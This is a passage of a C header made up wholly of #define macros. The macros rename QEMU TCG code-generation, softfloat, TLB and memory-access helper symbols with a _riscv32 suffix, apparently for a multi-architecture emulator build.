float128_lt_riscv32 #define float128_unordered float128_unordered_riscv32 #define float128_eq_quiet float128_eq_quiet_riscv32 #define float128_le_quiet float128_le_quiet_riscv32 #define float128_lt_quiet float128_lt_quiet_riscv32 #define float128_unordered_quiet float128_unordered_quiet_riscv32 #define floatx80_compare floatx80_compare_riscv32 #define floatx80_compare_quiet floatx80_compare_quiet_riscv32 #define float128_compare float128_compare_riscv32 #define float128_compare_quiet float128_compare_quiet_riscv32 #define floatx80_scalbn floatx80_scalbn_riscv32 #define float128_scalbn float128_scalbn_riscv32 #define softfloat_init softfloat_init_riscv32 #define tcg_optimize tcg_optimize_riscv32 #define gen_new_label gen_new_label_riscv32 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_riscv32 #define tcg_expand_vec_op tcg_expand_vec_op_riscv32 #define tcg_register_jit tcg_register_jit_riscv32 #define tcg_tb_insert tcg_tb_insert_riscv32 #define tcg_tb_remove tcg_tb_remove_riscv32 #define tcg_tb_lookup tcg_tb_lookup_riscv32 #define tcg_tb_foreach tcg_tb_foreach_riscv32 #define tcg_nb_tbs tcg_nb_tbs_riscv32 #define tcg_region_reset_all tcg_region_reset_all_riscv32 #define tcg_region_init tcg_region_init_riscv32 #define tcg_code_size tcg_code_size_riscv32 #define tcg_code_capacity tcg_code_capacity_riscv32 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_riscv32 #define tcg_malloc_internal tcg_malloc_internal_riscv32 #define tcg_pool_reset tcg_pool_reset_riscv32 #define tcg_context_init tcg_context_init_riscv32 #define tcg_tb_alloc tcg_tb_alloc_riscv32 #define tcg_prologue_init tcg_prologue_init_riscv32 #define tcg_func_start tcg_func_start_riscv32 #define tcg_set_frame tcg_set_frame_riscv32 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_riscv32 #define tcg_temp_new_internal tcg_temp_new_internal_riscv32 #define tcg_temp_new_vec tcg_temp_new_vec_riscv32 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_riscv32 #define tcg_temp_free_internal tcg_temp_free_internal_riscv32 #define tcg_const_i32 tcg_const_i32_riscv32 #define tcg_const_i64 tcg_const_i64_riscv32 #define tcg_const_local_i32 tcg_const_local_i32_riscv32 #define tcg_const_local_i64 tcg_const_local_i64_riscv32 #define tcg_op_supported tcg_op_supported_riscv32 #define tcg_gen_callN tcg_gen_callN_riscv32 #define tcg_op_remove tcg_op_remove_riscv32 #define tcg_emit_op tcg_emit_op_riscv32 #define tcg_op_insert_before tcg_op_insert_before_riscv32 #define tcg_op_insert_after tcg_op_insert_after_riscv32 #define tcg_cpu_exec_time tcg_cpu_exec_time_riscv32 #define tcg_gen_code tcg_gen_code_riscv32 #define tcg_gen_op1 tcg_gen_op1_riscv32 #define tcg_gen_op2 tcg_gen_op2_riscv32 #define tcg_gen_op3 tcg_gen_op3_riscv32 #define tcg_gen_op4 tcg_gen_op4_riscv32 #define tcg_gen_op5 tcg_gen_op5_riscv32 #define tcg_gen_op6 tcg_gen_op6_riscv32 #define tcg_gen_mb tcg_gen_mb_riscv32 #define tcg_gen_addi_i32 tcg_gen_addi_i32_riscv32 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_riscv32 #define tcg_gen_subi_i32 tcg_gen_subi_i32_riscv32 #define tcg_gen_andi_i32 tcg_gen_andi_i32_riscv32 #define tcg_gen_ori_i32 tcg_gen_ori_i32_riscv32 #define tcg_gen_xori_i32 tcg_gen_xori_i32_riscv32 #define tcg_gen_shli_i32 tcg_gen_shli_i32_riscv32 #define tcg_gen_shri_i32 tcg_gen_shri_i32_riscv32 #define tcg_gen_sari_i32 tcg_gen_sari_i32_riscv32 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_riscv32 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_riscv32 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_riscv32 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_riscv32 #define tcg_gen_muli_i32 tcg_gen_muli_i32_riscv32 #define tcg_gen_div_i32 tcg_gen_div_i32_riscv32 #define tcg_gen_rem_i32 tcg_gen_rem_i32_riscv32 #define tcg_gen_divu_i32 tcg_gen_divu_i32_riscv32 #define tcg_gen_remu_i32 tcg_gen_remu_i32_riscv32 #define tcg_gen_andc_i32 tcg_gen_andc_i32_riscv32 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_riscv32 #define tcg_gen_nand_i32 tcg_gen_nand_i32_riscv32 #define tcg_gen_nor_i32 tcg_gen_nor_i32_riscv32 #define tcg_gen_orc_i32 tcg_gen_orc_i32_riscv32 #define tcg_gen_clz_i32 tcg_gen_clz_i32_riscv32 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_riscv32 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_riscv32 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_riscv32 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_riscv32 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_riscv32 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_riscv32 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_riscv32 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_riscv32 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_riscv32 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_riscv32 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_riscv32 #define tcg_gen_extract_i32 tcg_gen_extract_i32_riscv32 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_riscv32 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_riscv32 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_riscv32 #define tcg_gen_add2_i32 tcg_gen_add2_i32_riscv32 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_riscv32 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_riscv32 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_riscv32 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_riscv32 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_riscv32 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_riscv32 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_riscv32 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_riscv32 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_riscv32 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_riscv32 #define tcg_gen_smin_i32 tcg_gen_smin_i32_riscv32 #define tcg_gen_umin_i32 tcg_gen_umin_i32_riscv32 #define tcg_gen_smax_i32 tcg_gen_smax_i32_riscv32 #define tcg_gen_umax_i32 tcg_gen_umax_i32_riscv32 #define tcg_gen_abs_i32 tcg_gen_abs_i32_riscv32 #define tcg_gen_addi_i64 tcg_gen_addi_i64_riscv32 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_riscv32 #define tcg_gen_subi_i64 tcg_gen_subi_i64_riscv32 #define tcg_gen_andi_i64 tcg_gen_andi_i64_riscv32 #define tcg_gen_ori_i64 tcg_gen_ori_i64_riscv32 #define tcg_gen_xori_i64 tcg_gen_xori_i64_riscv32 #define tcg_gen_shli_i64 tcg_gen_shli_i64_riscv32 #define tcg_gen_shri_i64 tcg_gen_shri_i64_riscv32 #define tcg_gen_sari_i64 tcg_gen_sari_i64_riscv32 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_riscv32 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_riscv32 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_riscv32 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_riscv32 #define tcg_gen_muli_i64 tcg_gen_muli_i64_riscv32 #define tcg_gen_div_i64 tcg_gen_div_i64_riscv32 #define tcg_gen_rem_i64 tcg_gen_rem_i64_riscv32 #define tcg_gen_divu_i64 tcg_gen_divu_i64_riscv32 #define tcg_gen_remu_i64 tcg_gen_remu_i64_riscv32 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_riscv32 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_riscv32 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_riscv32 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_riscv32 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_riscv32 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_riscv32 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_riscv32 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_riscv32 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_riscv32 #define tcg_gen_not_i64 tcg_gen_not_i64_riscv32 #define tcg_gen_andc_i64 tcg_gen_andc_i64_riscv32 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_riscv32 #define tcg_gen_nand_i64 tcg_gen_nand_i64_riscv32 #define tcg_gen_nor_i64 tcg_gen_nor_i64_riscv32 #define tcg_gen_orc_i64 tcg_gen_orc_i64_riscv32 #define tcg_gen_clz_i64 tcg_gen_clz_i64_riscv32 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_riscv32 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_riscv32 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_riscv32 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_riscv32 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_riscv32 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_riscv32 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_riscv32 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_riscv32 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_riscv32 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_riscv32 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_riscv32 #define tcg_gen_extract_i64 tcg_gen_extract_i64_riscv32 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_riscv32 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_riscv32 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_riscv32 #define tcg_gen_add2_i64 tcg_gen_add2_i64_riscv32 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_riscv32 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_riscv32 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_riscv32 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_riscv32 #define tcg_gen_smin_i64 tcg_gen_smin_i64_riscv32 #define tcg_gen_umin_i64 tcg_gen_umin_i64_riscv32 #define tcg_gen_smax_i64 tcg_gen_smax_i64_riscv32 #define tcg_gen_umax_i64 tcg_gen_umax_i64_riscv32 #define tcg_gen_abs_i64 tcg_gen_abs_i64_riscv32 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_riscv32 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_riscv32 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_riscv32 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_riscv32 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_riscv32 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_riscv32 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_riscv32 #define tcg_gen_exit_tb tcg_gen_exit_tb_riscv32 #define tcg_gen_goto_tb tcg_gen_goto_tb_riscv32 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_riscv32 #define check_exit_request check_exit_request_riscv32 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_riscv32 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_riscv32 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_riscv32 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_riscv32 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_riscv32 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_riscv32 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_riscv32 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_riscv32 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_riscv32 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_riscv32 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_riscv32 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_riscv32 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_riscv32 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_riscv32 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_riscv32 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_riscv32 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_riscv32 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_riscv32 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_riscv32 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_riscv32 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_riscv32 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_riscv32 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_riscv32 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_riscv32 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_riscv32 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_riscv32 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_riscv32 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_riscv32 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_riscv32 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_riscv32 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_riscv32 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_riscv32 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_riscv32 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_riscv32 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_riscv32 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_riscv32 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_riscv32 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_riscv32 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_riscv32 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_riscv32 #define simd_desc simd_desc_riscv32 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_riscv32 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_riscv32 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_riscv32 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_riscv32 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_riscv32 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_riscv32 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_riscv32 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_riscv32 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_riscv32 #define tcg_gen_gvec_2 tcg_gen_gvec_2_riscv32 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_riscv32 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_riscv32 #define tcg_gen_gvec_3 tcg_gen_gvec_3_riscv32 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_riscv32 #define tcg_gen_gvec_4 tcg_gen_gvec_4_riscv32 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_riscv32 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_riscv32 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_riscv32 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_riscv32 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_riscv32 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_riscv32 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_riscv32 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_riscv32 #define tcg_gen_gvec_not tcg_gen_gvec_not_riscv32 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_riscv32 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_riscv32 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_riscv32 #define tcg_gen_gvec_add tcg_gen_gvec_add_riscv32 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_riscv32 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_riscv32 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_riscv32 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_riscv32 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_riscv32 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_riscv32 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_riscv32 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_riscv32 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_riscv32 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_riscv32 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_riscv32 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_riscv32 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_riscv32 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_riscv32 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_riscv32 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_riscv32 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_riscv32 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_riscv32 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_riscv32 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_riscv32 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_riscv32 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_riscv32 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_riscv32 #define tcg_gen_gvec_and tcg_gen_gvec_and_riscv32 #define tcg_gen_gvec_or tcg_gen_gvec_or_riscv32 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_riscv32 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_riscv32 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_riscv32 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_riscv32 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_riscv32 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_riscv32 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_riscv32 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_riscv32 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_riscv32 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_riscv32 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_riscv32 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_riscv32 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_riscv32 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_riscv32 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_riscv32 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_riscv32 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_riscv32 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_riscv32 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_riscv32 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_riscv32 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_riscv32 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_riscv32 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_riscv32 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_riscv32 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_riscv32 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_riscv32 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_riscv32 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_riscv32 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_riscv32 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_riscv32 #define vec_gen_2 vec_gen_2_riscv32 #define vec_gen_3 vec_gen_3_riscv32 #define vec_gen_4 vec_gen_4_riscv32 #define tcg_gen_mov_vec tcg_gen_mov_vec_riscv32 #define tcg_const_zeros_vec tcg_const_zeros_vec_riscv32 #define tcg_const_ones_vec tcg_const_ones_vec_riscv32 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_riscv32 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_riscv32 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_riscv32 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_riscv32 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_riscv32 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_riscv32 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_riscv32 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_riscv32 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_riscv32 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_riscv32 #define tcg_gen_ld_vec tcg_gen_ld_vec_riscv32 #define tcg_gen_st_vec tcg_gen_st_vec_riscv32 #define tcg_gen_stl_vec tcg_gen_stl_vec_riscv32 #define tcg_gen_and_vec tcg_gen_and_vec_riscv32 #define tcg_gen_or_vec tcg_gen_or_vec_riscv32 #define tcg_gen_xor_vec tcg_gen_xor_vec_riscv32 #define tcg_gen_andc_vec tcg_gen_andc_vec_riscv32 #define tcg_gen_orc_vec tcg_gen_orc_vec_riscv32 #define tcg_gen_nand_vec tcg_gen_nand_vec_riscv32 #define tcg_gen_nor_vec tcg_gen_nor_vec_riscv32 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_riscv32 #define tcg_gen_not_vec tcg_gen_not_vec_riscv32 #define tcg_gen_neg_vec tcg_gen_neg_vec_riscv32 #define tcg_gen_abs_vec tcg_gen_abs_vec_riscv32 #define tcg_gen_shli_vec tcg_gen_shli_vec_riscv32 #define tcg_gen_shri_vec tcg_gen_shri_vec_riscv32 #define tcg_gen_sari_vec tcg_gen_sari_vec_riscv32 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_riscv32 #define tcg_gen_add_vec tcg_gen_add_vec_riscv32 #define tcg_gen_sub_vec tcg_gen_sub_vec_riscv32 #define tcg_gen_mul_vec tcg_gen_mul_vec_riscv32 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_riscv32 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_riscv32 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_riscv32 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_riscv32 #define tcg_gen_smin_vec tcg_gen_smin_vec_riscv32 #define tcg_gen_umin_vec tcg_gen_umin_vec_riscv32 #define tcg_gen_smax_vec tcg_gen_smax_vec_riscv32 #define tcg_gen_umax_vec tcg_gen_umax_vec_riscv32 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_riscv32 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_riscv32 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_riscv32 #define tcg_gen_shls_vec tcg_gen_shls_vec_riscv32 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_riscv32 #define tcg_gen_sars_vec tcg_gen_sars_vec_riscv32 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_riscv32 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_riscv32 #define tb_htable_lookup tb_htable_lookup_riscv32 #define tb_set_jmp_target tb_set_jmp_target_riscv32 #define cpu_exec cpu_exec_riscv32 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_riscv32 #define cpu_reloading_memory_map cpu_reloading_memory_map_riscv32 #define cpu_loop_exit cpu_loop_exit_riscv32 #define cpu_loop_exit_restore cpu_loop_exit_restore_riscv32 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_riscv32 #define tlb_init tlb_init_riscv32 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_riscv32 #define tlb_flush tlb_flush_riscv32 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_riscv32 #define tlb_flush_all_cpus tlb_flush_all_cpus_riscv32 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_riscv32 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_riscv32 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_riscv32 #define tlb_flush_page tlb_flush_page_riscv32 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_riscv32 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_riscv32 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_riscv32 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_riscv32 #define tlb_protect_code tlb_protect_code_riscv32 #define tlb_unprotect_code tlb_unprotect_code_riscv32 #define tlb_reset_dirty tlb_reset_dirty_riscv32 #define tlb_set_dirty tlb_set_dirty_riscv32 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_riscv32 #define tlb_set_page tlb_set_page_riscv32 #define get_page_addr_code_hostp get_page_addr_code_hostp_riscv32 #define get_page_addr_code get_page_addr_code_riscv32 #define probe_access probe_access_riscv32 #define tlb_vaddr_to_host tlb_vaddr_to_host_riscv32 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_riscv32 #define helper_le_lduw_mmu helper_le_lduw_mmu_riscv32 #define helper_be_lduw_mmu helper_be_lduw_mmu_riscv32 #define helper_le_ldul_mmu helper_le_ldul_mmu_riscv32 #define helper_be_ldul_mmu helper_be_ldul_mmu_riscv32 #define helper_le_ldq_mmu helper_le_ldq_mmu_riscv32 #define helper_be_ldq_mmu helper_be_ldq_mmu_riscv32 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_riscv32 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_riscv32 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_riscv32 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_riscv32 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_riscv32 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_riscv32 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_riscv32 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_riscv32 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_riscv32 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_riscv32 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_riscv32 #define cpu_ldub_data_ra cpu_ldub_data_ra_riscv32 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_riscv32 #define cpu_lduw_data_ra cpu_lduw_data_ra_riscv32 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_riscv32 #define cpu_ldl_data_ra cpu_ldl_data_ra_riscv32 #define cpu_ldq_data_ra cpu_ldq_data_ra_riscv32 #define cpu_ldub_data cpu_ldub_data_riscv32 #define cpu_ldsb_data cpu_ldsb_data_riscv32 #define cpu_lduw_data cpu_lduw_data_riscv32 #define cpu_ldsw_data cpu_ldsw_data_riscv32 #define cpu_ldl_data cpu_ldl_data_riscv32 #define cpu_ldq_data cpu_ldq_data_riscv32 #define helper_ret_stb_mmu helper_ret_stb_mmu_riscv32 #define helper_le_stw_mmu helper_le_stw_mmu_riscv32 #define helper_be_stw_mmu helper_be_stw_mmu_riscv32 #define helper_le_stl_mmu helper_le_stl_mmu_riscv32 #define helper_be_stl_mmu helper_be_stl_mmu_riscv32 #define helper_le_stq_mmu helper_le_stq_mmu_riscv32 #define helper_be_stq_mmu helper_be_stq_mmu_riscv32 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_riscv32 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_riscv32 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_riscv32 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_riscv32 #define cpu_stb_data_ra cpu_stb_data_ra_riscv32 #define cpu_stw_data_ra cpu_stw_data_ra_riscv32 #define 